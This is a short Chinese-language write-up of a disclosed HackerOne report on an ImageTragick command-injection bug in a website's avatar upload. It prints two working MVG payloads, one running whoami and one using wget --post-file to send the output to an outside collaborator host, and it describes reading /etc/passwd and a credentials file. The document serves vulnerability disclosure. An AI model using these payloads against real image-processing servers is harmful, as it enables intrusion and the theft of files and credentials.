HackerOne | 頭像上傳imagetragick命令執行

• 2019 年 12 月 13 日
• 筆記

漏洞資訊

發現者：alyssa_herrera

漏洞種類：命令執行

危害等級：高危

漏洞狀態：已修復

前言

alyssa_herrera在sofurry.com頭像上傳處存在imagetragick命令執行，能夠發現一個配置文件包含資料庫憑證、其他密鑰，影響網站。

漏洞再現

在審核配置文件頭像功能的過程中，我發現通過使用curl請求（如下所示） 使網站受到image tragick影響。

然後我去請求 /etc/passwd。

然後我想進一步擴大rce的影響。由於不想反彈shell到伺服器上，我選擇簡單的在tmp文件夾中創建一個文件，然後將命令輸出保存到該文件中，然後對其進行提取。payload如下：

push graphic-context  viewbox 0 0 640 480  fill 'url(https://example.com/image.jpg "|whoami>>/tmp/alyssa.txt")'  pop graphic-context

然後我們使用wget去讀取它。

push graphic-context  viewbox 0 0 640 480  fill 'url(https://example.com/image.jpg "|wget --post-file /tmp/alyssa.txt XXX.burpcollaborator.net")'  pop graphic-context

接著一個簡單的命令ls -la。

然後我又讀取了位於受保護目錄中的index-test.php文件的內容。

當我讀取到這配置文件，記錄下來後立即報告了它。

漏洞影響

該漏洞可以讓攻擊者執行任意命令，讀取伺服器上的文件，甚至控制伺服器。

烏雲相關文章

有緣網主站命令執行 (ImageMagick 修補程式繞過)：

https://wooyun.x10sec.org/static/bugs/wooyun-2016- 0214787.html

開心網主站 ImageMagick 命令執行三處 ：

https://wooyun.x10sec.org/static/bugs/wooyun-2016- 0205530.html

SAE 沙盒繞過（ImageMagick CVE20163714 應用實例）：

 https://wooyun.x10sec.org/static/bugs/wooyun-2016- 0205051.html

翻譯自hackerone